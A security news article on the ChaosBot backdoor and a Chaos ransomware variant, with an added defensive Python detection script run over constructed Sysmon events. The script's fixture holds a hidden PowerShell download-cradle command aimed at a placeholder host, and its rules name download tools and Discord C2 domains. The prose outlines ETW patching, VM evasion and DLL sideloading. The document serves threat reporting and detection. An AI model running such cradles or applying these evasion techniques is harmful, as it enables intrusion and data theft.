A new backdoor, dubbed ChaosBot, has been discovered by cybersecurity researchers. The malware, which is written in the Rust programming language, allows attackers to take control of a compromised host to conduct reconnaissance and execute arbitrary commands. The eSentire cybersecurity firm first detected ChaosBot in late September 2025 within the environment of a financial services client. Attackers gained initial access by using stolen credentials for both a Cisco VPN and a privileged Active Directory account. They then used Windows Management Instrumentation (WMI) to remotely execute commands and deploy the ChaosBot malware across the network.
The malware stands out for its unique use of Discord as a command-and-control (C2) channel. Its name comes from a Discord profile used by the primary threat actor, who goes by the name “chaos_00019.” This individual issues remote commands to infected devices through Discord, with another user account, “lovebb0024,” also associated with C2 operations. The malware’s primary function is to interact with a specific Discord channel, created with the victim’s computer name, to receive instructions. It supports several commands, including “shell” for executing PowerShell commands, “scr” for taking screenshots, “download” for downloading files to the victim, and “upload” for uploading files to the Discord channel.
In addition to the initial access method, ChaosBot has also been observed spreading through phishing emails. These emails contain a malicious Windows shortcut (.LNK) file. If a recipient opens the file, it executes a PowerShell command to download and run ChaosBot. As a distraction, the malware simultaneously displays a decoy PDF file that appears to be from the State Bank of Vietnam. The malicious payload is a DLL file named “msedge_elf.dll,” which is sideloaded using a legitimate Microsoft Edge binary. After this, it conducts system reconnaissance and downloads a fast reverse proxy (FRP) to create a reverse proxy into the network, ensuring persistent access.
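As an added example (not code from eSentire's report or from the malware), the following Python triage runs over constructed Sysmon-style events and flags the behaviours described above: a shell spawned by WmiPrvSE.exe (the WMI remote execution), a shortcut-launched PowerShell download cradle, msedge_elf.dll loaded from outside the Edge install directory (the sideload), and a non-Discord process connecting to Discord domains (the C2 channel). The event fields follow Sysmon naming; paths, hostnames and command lines are constructed placeholders, not indicators from the report.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style events (placeholder paths/hosts, not real telemetry).
EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell -nop -w hidden -c <remote command>"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -c Invoke-WebRequest http://PLACEHOLDER/p -OutFile x"},
    {"EventID": 7, "Image": r"C:\Users\u\AppData\Local\Temp\msedge.exe",
     "ImageLoaded": r"C:\Users\u\AppData\Local\Temp\msedge_elf.dll"},
    {"EventID": 7, "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "ImageLoaded": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge_elf.dll"},
    {"EventID": 3, "Image": r"C:\Users\u\AppData\Local\Temp\msedge.exe",
     "DestinationHostname": "discord.com"},
    {"EventID": 3, "Image": r"C:\Users\u\AppData\Local\Discord\app\Discord.exe",
     "DestinationHostname": "discord.com"},
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
DISCORD_DOMAINS = ("discord.com", "discordapp.com", "discord.gg")
DOWNLOAD_RE = re.compile(r"invoke-webrequest|downloadfile|downloadstring|\biwr\b|\bcurl\b", re.I)

def _name(path): return PureWindowsPath(path).name.lower()
# Legitimate msedge_elf.dll lives under ...\Microsoft\Edge\...; anywhere else is suspect.
def _under_edge_install(path): return "\\microsoft\\edge\\" in path.lower()

def check(ev):
    # Return the name of the first matching rule for one event, or None.
    eid = ev.get("EventID")
    if eid == 1:  # process creation
        child, parent = _name(ev["Image"]), _name(ev["ParentImage"])
        if parent == "wmiprvse.exe" and child in SHELLS:
            return "wmi_remote_shell"          # WMI-launched shell (remote execution)
        if parent == "explorer.exe" and child in SHELLS and DOWNLOAD_RE.search(ev.get("CommandLine", "")):
            return "lnk_download_cradle"       # user-opened shortcut pulling a payload
    elif eid == 7:  # image load
        if _name(ev["ImageLoaded"]) == "msedge_elf.dll" and not _under_edge_install(ev["ImageLoaded"]):
            return "msedge_elf_sideload"       # Edge binary loading its DLL from an odd directory
    elif eid == 3:  # network connection
        host = ev.get("DestinationHostname", "").lower()
        if host.endswith(DISCORD_DOMAINS) and _name(ev["Image"]) != "discord.exe":
            return "non_discord_client_to_discord"  # possible Discord-based C2
    return None

def triage(events):
    # (index, rule) for every event that matches a rule; unmatched events are dropped.
    return [(i, r) for i, ev in enumerate(events) if (r := check(ev)) is not None]
```

The legitimate Edge image load and the real Discord client connection in the sample set are deliberately left unflagged, which is the point of checking the load path and the connecting process rather than the DLL name or domain alone.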
Researchers also noted the attackers attempted to configure a Visual Studio Code Tunnel service as an additional backdoor for command execution, but this effort was unsuccessful. The malware also includes evasion techniques to bypass Event Tracing for Windows (ETW) and virtual machine (VM) detection. It achieves this by patching the ntdll!EtwEventWrite function and by checking for MAC addresses commonly used by VMware and VirtualBox. If it detects a VM environment, the malware will simply exit, preventing analysis.
In a separate report, Fortinet FortiGuard Labs detailed a new, more destructive variant of Chaos Ransomware, written in C++. This variant introduces two new capabilities: destructive encryption and clipboard hijacking. Unlike traditional ransomware that only encrypts files, this version can irrevocably delete large files (over 1.3 GB) rather than encrypting them. Furthermore, it manipulates clipboard content by replacing copied Bitcoin addresses with an attacker-controlled wallet address to redirect cryptocurrency transfers. This dual-pronged approach of destructive extortion and financial fraud makes the new Chaos variant a more aggressive and multifaceted threat.
The new Chaos-C++ ransomware is typically distributed by posing as bogus utilities like “System Optimizer v2.1” to trick users into installing it. Previous versions of Chaos ransomware have been distributed under the guise of fake applications like OpenAI ChatGPT and InVideo AI. Once launched, the malware first checks for a specific file to determine whether it has already been executed on the machine. If not, it checks for administrative privileges and then runs a series of commands to inhibit system recovery. The ransomware then begins its encryption process, fully encrypting files under 50 MB while skipping those between 50 MB and 1.3 GB. It uses either symmetric or asymmetric encryption, with a fallback XOR routine, which makes its execution more robust and harder to disrupt.